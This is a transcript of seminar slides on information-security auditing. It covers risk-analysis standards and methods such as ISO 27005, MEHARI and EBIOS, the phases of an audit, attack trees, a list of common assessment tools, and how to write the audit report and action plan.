Séminaire Confiance Numérique Audit et Test de...
-
Upload
doannguyet -
Category
Documents
-
view
224 -
download
6
Transcript of Séminaire Confiance Numérique Audit et Test de...
![Page 1: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/1.jpg)
Audit et Test de Sécuritédes Systèmes d'Information
Florent Autréau - [email protected] / [email protected]
7 mai 2015
Séminaire Confiance Numérique
![Page 2: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/2.jpg)
Objectives● Introduction to Standards, Methods and
Tools used to assess Security of Information System
● “CookBook”/ Recipes to conduct Security Audit
![Page 3: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/3.jpg)
What is a Security Audit ? For what Purpose ?
![Page 4: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/4.jpg)
Information Security Audit
● Audit : ● Risk Assessment● Assessment and Evaluation of conformance with
security policy and set of security rules. ● Reference : Set of rules defining organization, procedure and/or technology to ensure information security.
![Page 5: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/5.jpg)
● ANSSI :– www.ssi.gouv.fr
● CERT :– www.cert.org
● NIST :– csrc.nist.gov
● CNRS :– www.sg.cnrs.fr/fsd
● ISACA :– www.isaca.org
● ITIL :– www.itil.co.uk
● ISF :– www.securityforum.fr
Identification Désignation SourceEBIOS Méthode ANSSIMEHARI Méthode CLUSIFOCTAVE Méthode CERTPSSI Guide Méthodologique ANSSITDBSSI Guide Méthodologique ANSSIRMF Guide Méthodologique NISTSP800-60 Guide Méthodologique NISTITIL Guide de bonnes pratiques OGC – BSICOBIT Guide de bonnes pratiques ISACAITSEC Norme d'exigences UE – ANSSIISO 15408 Norme d'exigences ISONF Z 42-013 Norme d'exigences AFNORISO 2700x Norme de bonnes pratiques ISOPP nc / 0XX Guide Technique ANSSISP800-45 Guide Technique NIST
![Page 6: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/6.jpg)
Antoine Rojat / Florent Autréau
Standards for ISMS (Information Security Management System)
200
8
BS7799-2:2002 BS7799-1:2000
ISO17799:2005
2005
-
BS7799-3:2005
Requirements Recommandations
200
920
09 +
…
2007
ISO 27001:2005ISMS - Requirements
ISO 27006Requirements for ISMS certification
bodiesGuidelines for accreditation of
certification bodies
ISO 27002Guidelines / Good Practices for IS
ManagementBase for declaration of applicability
ISO 27003Guidelines to implement ISMS
Practical Guidance for CISO/CSO
ISO 27004Measurement for ISMS
Definition and Lifecycle of Metrics
ISO 27000Glossary
ISO 27008Guidance for auditing metrics of ISMS
ISO 27005Risk Management for Information Sec
Processes of ISRMAnnex : Method for Risk Mgt
ISO 27007Guidance for ISMS audit
Annexes for ISMS auditing
![Page 7: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/7.jpg)
![Page 8: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/8.jpg)
Why assessing Information Security ?
● Evaluate and validate security practices ( control, quality processes );
● Validate procedures to alert, react and handle incident or disaster;
● Detect “forgotten/ignored” stakes or weaknesses;
● Educate users, management, employees to Information Security and Risk Management.
![Page 9: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/9.jpg)
The good questions
● What are the assets ?● What are the threats ?● What are the vulnerabilities ?● What could be the impact/cost ?● What are the strategies to handle the
risk ?
![Page 10: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/10.jpg)
Risk Analysis - Terminology
• Threat : • what from you want protect valuable assets • anything (man made or act of nature) that has the
potential to cause harm ( a.k.a Menace )• Vulnerability :
• Failure or Deviation of the Information System• weakness that could be used to endanger or cause
harm to an informational asset• Risk :
• when Threat exploits Vulnerability against Valuable Asset
• Probability that event will happen with a negative impact to an informational asset
![Page 11: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/11.jpg)
Antoine Rojat / Florent Autréau
Business Assets
Informational Assets
IT Services / ApplicationsApplication Application Service Service
Information Activities Information
InfrastructurePC DB Server … Servers
Data Center
Identification of Threats
Mapping of existing measures
Identification of Vulnerabilities
Definition of evaluation criteria
Definition of acceptance criteria
1243PCID
Classification of Security Issues
Classification of risk scenarios (Impact, Potentiality)
Probability
Impact1 2 3 4
1234
RSK-01
RSK-02 RSK-03
RSK-05
RSK-07RSK-08 RSK-09
RSK-10
RSK-04RSK-06 Evaluation of risk scenarios
Identification of risk scenarios
ISO 27005 – Risk Analysis
![Page 12: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/12.jpg)
MEHARI● MEthode Harmonisée d'Analyse de RIsques (MEHARI)
- Commission Méthodes du CLUSIF (CLUb de la Sécurité de l'Information Français)
● 6 factors for risks : – 3 for potentiality and 3 for impact ;
● 6 types of security measures: – structural, dissuasive, prevent/protection, palliative
and recovery.
![Page 13: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/13.jpg)
BIENS ou ACTIFS
sont la CIBLE de
MENACE POTENTIELLE
se CONCRETISE par une
AGRESSION
qui DECLENCHE une
DETERIORATION
qui PROVOQUE des
DEGATS
PERTES
qui OCCASIONNENT des
Mesures
Structurelles
Dissuasives
Préventives
Protection
Palliatives
Récupération
Qualité
de
Services
de
Sécurité
POTENTIALITE
IMPACT
GRAVITÉ
des
SCÉNARIOS
Causes
Conséquences
ENJEUX
![Page 14: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/14.jpg)
14
EBIOS
Risk Analysis
– ANSSI – Version 3 (2010)– 5 modules– ISO 27001– French
![Page 15: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/15.jpg)
OCTAVE Allegro
■ From CERT http://www.CERT.org/octave/osig.html
■ Operationally Critical Threat, Asset, and Vulnerability EvaluationSM (OCTAVE®)
■ self-directed approach
■ Required broad knowledge of business and security processes
![Page 16: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/16.jpg)
Conducting a Security Audit without wearing suit & tie
![Page 17: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/17.jpg)
Phases of the Audit● Preparation● Documentation Review● Interviews, talks, visits● Technical Investigation, Data Collection● Data Analysis● Synthesis and report writing● Report Presentation ● Planning corrective actions
![Page 18: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/18.jpg)
InfoSec Audit (1)
● "White Box " – audit in situ;– Access to buildings, organization, data,
processes, documentation and procedures;– Access to people with interviews of
managers and people in charge of operation.
![Page 19: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/19.jpg)
InfoSec Audit (2)
● " Black Box " – Partial knowledge and/or access to the
Information System (organization, documents procedures, sites, people);
– Reveal/spot weaknesses :
● Ex: penetration testing.
![Page 20: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/20.jpg)
![Page 21: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/21.jpg)
Who can perform an audit ?
● AUTHORIZED personal● System/network administrator, consultant,
contractor
● Technical and Business Knowledge● Excellent Communication Skills● Certified (ex: ISO Lead Auditor, PASSI)
Trained and Educated people
![Page 22: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/22.jpg)
Limitations
● Based on interviews with declarations and claims that can be twisted (intentionally or not);
● Context and time dependent;● Snapshot / view.
![Page 23: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/23.jpg)
Where to start ?
● Define the contract : daily job, mission, contract, order, ...
● Define the type of audit ( host-based, network-based, 'white-box', 'black-box', penetration testing, … )
● Define perimeter and schedule ● List people to be involved
![Page 24: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/24.jpg)
How to perform an Audit ?● Define the type of Audit, Target,
Perimeter● Prepare the Tools● Review Policies and Documentation● Data Collection● Analyze and Synthesis● Writing the Report ● Presentation● Planning Corrective Actions
![Page 25: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/25.jpg)
Collect information
● Collect information on the target :● Documentation : policies, “chartes”, etc ...● Interview● Research : Google, Whois, DNS, department of
commerce ...
Goal: Identify systems, processes, applications, people, organizations as well as documents
![Page 26: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/26.jpg)
Cartography
● Detection of systems and services , cartography :
● Locating and visiting sites and buildings (if possible)
● Documentation● Asset Management Tools or Network Management
● Ex: HP OpenView, Lan Manager, N-View● Network Topology : IP routing, SMTP ...● Detection of ports/services● Identification of systems
![Page 27: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/27.jpg)
Looking for Vulnerabilities● Scan and exploitation of vulnerabilities :
● Physical (garbage dumping, wires, access to resources)
● Network (filtering policies, equipments)● Systems (patches, active services)● Applications
● Web / App Server,● Database,● Mail Server,● Directory,● ...
![Page 28: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/28.jpg)
● Take and Secure Position● Progress● Move Deeper and Deeper
![Page 29: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/29.jpg)
Attack/Fault Tree Analysis
FTA : Fault Tree Analysis
● Start with target or undesired event to study
● Identify possible attacks and conditions
● Construct and evaluate the attack/fault tree
– By break down– Specify frequency/probability/costs
● Risk mitigation / hazard control
![Page 30: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/30.jpg)
Attack Tree ( start with root goal )
![Page 31: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/31.jpg)
Attack Tree ( with more details )
![Page 32: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/32.jpg)
Attack Tree ( with cost estimates )
![Page 33: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/33.jpg)
The Toolbox
![Page 34: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/34.jpg)
... with a strategy
![Page 35: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/35.jpg)
Mehari – Interview Guidelines
![Page 36: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/36.jpg)
Prepare the Tools
● Safe, Trusted and Autonomous Platform for execution and storage of resulting data.
● Dedicated laptop● USB or CD-based bootable (such as Kali) , VM
● Retrieve, install and configure necessary tools.
● Eventually development.
● Get used and trained.
● Verify ALL tools used are untampered with.
![Page 37: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/37.jpg)
Discovery Tools (1)
● Information : WhoIS, Dig, ...● Topology
● IP : Traceroute, Itrace, Tctrace, ...● SNMP : SNMPWalk● SMB : LinNeighborood, NBTscan
● Network or System Administration● HP-Openview, N-View
● Services :● Nmap, Amap
![Page 38: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/38.jpg)
Discovery Tools (2)
● Wi-Fi ● Kismet
● Bluetooth● BTScanner
![Page 39: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/39.jpg)
Network Flow Analysis
● Wireshark ● Etherape● Ntop
![Page 40: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/40.jpg)
Testing Configuration
● HIDS – Host Based Intrusion Detection– MSAT – Microsoft Security Assessment Tool– Sara (Unix)– JASS (Solaris Security Toolkit)– Bastille– Checkperms– Utilities from sysinternals.com
![Page 41: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/41.jpg)
Vulnerabilities Scanners● Framework :
– Nessus/OpenVAS, nexpose– Nikto, Wikto, W3af, wapiti– BlueSnarf– Metasploit
● Sending Virus Samples● Code Injection, Packet Injection● XSS (Cross Site Scripting)
![Page 42: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/42.jpg)
FuzzerTesting based on random generation of
data (either properly formatted and syntaxically correct, or not)
● Fusil ● Sulley● Defensics (Codenomicon)
![Page 43: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/43.jpg)
Using Firefox as Security ToolsTesting based on use of Firefox add-ons
● FireCAT – catalog of Auditing Tools
● FoxyProxy – advanced proxy management
● Firebug – edit/debug of CSS, HTML, Javascript
● Flashbug
● Firecookie
● Modify Headers● XSSme, RegEx Tester
![Page 44: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/44.jpg)
![Page 45: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/45.jpg)
OWASP Top 10 Tools
A1: Injection – ZAPA2: Cross-Site Scripting (XSS) - BeEFA3: Broken Authentication and Session Management -HackBarA4: Insecure Direct Object References - Burp SuiteA5: Cross-Site Request Forgery (CSRF) – Tamper DataA6: Security Misconfiguration – WatoboA7: Insecure Cryptographic Storage N/AA8: Failure to Restrict URL Access - Nikto/WiktoA9: Insufficient Transport Layer Protection - CalomelA10: Unvalidated Redirects and Forwards – Watcher
![Page 46: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/46.jpg)
Toolbox for analysis● RATS
● Splint
● Flawfinder
● HP Fortify Static Code Analyzer
● Coverity SWAT
● Protocol Validation (formal or not)
– Avispa, ProVerif, Scyther
More detailed information on www.dwheeler.com
![Page 47: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/47.jpg)
But also● Code Reading ● Design Analysis● Protocol Validation (formal or not)● Social Engineer Toolkit ...
![Page 48: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/48.jpg)
![Page 49: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/49.jpg)
Refund
![Page 50: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/50.jpg)
Report
● Analysis and synthesis in report ● Achievement of audit ● Readable and adapted to audience
● From executive summary to detailed annexes
● Adapted to the business objectives● Definition of an action plan
![Page 51: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/51.jpg)
Audience● Executive● Stockholders● Managers● Operational staf● Technical staf (techno-geek)
![Page 52: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/52.jpg)
Content● Title, Introduction, legal ● Executive Summary● Prioritized recommendations (with cost) ● Report (following the structure of MEHARI
domains)● Conclusion and detailed recommendations● Annexes
![Page 53: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/53.jpg)
So What ?
● Definition of action plan for correction● Action● Who is the owner ?● Who is involved/concerned ?● When is it due ?● How much ?
● Require everyone's involvement
![Page 54: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/54.jpg)
References - Recommended readings
● Risks Digest - Forum On Risks To The Public In Computers And Related Systems
http://catless.ncl.ac.uk/Risks
● 'Security Engineering, 2nd ed', Ross Anderson
http://www.cl.cam.ac.uk/~rja14/book.html
● OSSTMM - Open Source Security Testing Methodology Manual
http://www.isecom.org/osstmm/
![Page 55: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/55.jpg)
Questions ?
![Page 56: Séminaire Confiance Numérique Audit et Test de …confiance-numerique.clermont-universite.fr/Slides/F-Autreau.pdfITIL : – ... COBIT Guide de bonnes pratiques ISACA ITSEC Norme](https://reader034.fdocuments.us/reader034/viewer/2022051407/5adfa65e7f8b9a97518c3c44/html5/thumbnails/56.jpg)
Meet you in Grenoble on Nov 20th